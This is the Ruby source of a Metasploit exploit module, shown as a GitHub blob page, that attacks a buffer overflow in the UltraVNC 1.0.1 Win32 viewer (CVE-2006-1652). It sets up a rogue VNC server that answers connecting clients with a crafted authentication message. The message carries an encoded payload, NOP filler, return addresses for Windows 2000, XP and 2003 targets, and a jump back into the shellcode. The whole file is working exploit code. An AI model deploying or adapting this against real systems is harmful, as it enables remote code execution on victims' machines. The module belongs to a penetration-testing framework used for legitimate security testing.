Path: blob/master/modules/exploits/windows/vnc/ultravnc_client.rb
19516 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::TcpServer910def initialize(info = {})11super(12update_info(13info,14'Name' => 'UltraVNC 1.0.1 Client Buffer Overflow',15'Description' => %q{16This module exploits a buffer overflow in UltraVNC Win3217Viewer 1.0.1 Release.18},19'Author' => 'MC',20'License' => MSF_LICENSE,21'References' => [22[ 'CVE', '2006-1652' ],23[ 'OSVDB', '24456' ],24[ 'BID', '17378' ],25],26'DefaultOptions' => {27'EXITFUNC' => 'thread',28},29'Payload' => {30'Space' => 500,31'BadChars' => "\x00",32'MaxNops' => 0,33'StackAdjustment' => -3500,34},35'Platform' => 'win',36'Targets' => [37[ 'Windows 2000 SP4 English', { 'Ret' => 0x7c2ec68b } ],38[ 'Windows XP SP2 English', { 'Ret' => 0x77dc15c0 } ],39[ 'Windows 2003 SP1 English', { 'Ret' => 0x76aa679b } ],40],41'Privileged' => false,42'DisclosureDate' => '2006-04-04',43'DefaultTarget' => 0,44'Notes' => {45'Reliability' => UNKNOWN_RELIABILITY,46'Stability' => UNKNOWN_STABILITY,47'SideEffects' => UNKNOWN_SIDE_EFFECTS48}49)50)5152register_options(53[54OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])55]56)57end5859def on_client_connect(client)60rfb = "RFB 003.006\n"6162client.put(rfb)63end6465def on_client_data(client)66return if ((p = regenerate_payload(client)) == nil)6768filler = make_nops(980 - payload.encoded.length)6970sploit = "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"71sploit << payload.encoded + filler + [target.ret].pack('V')72sploit << "PASSWORD" + [0xe8, -997].pack('CV')7374print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")75client.put(sploit)7677handler78service.close_client(client)79end80end818283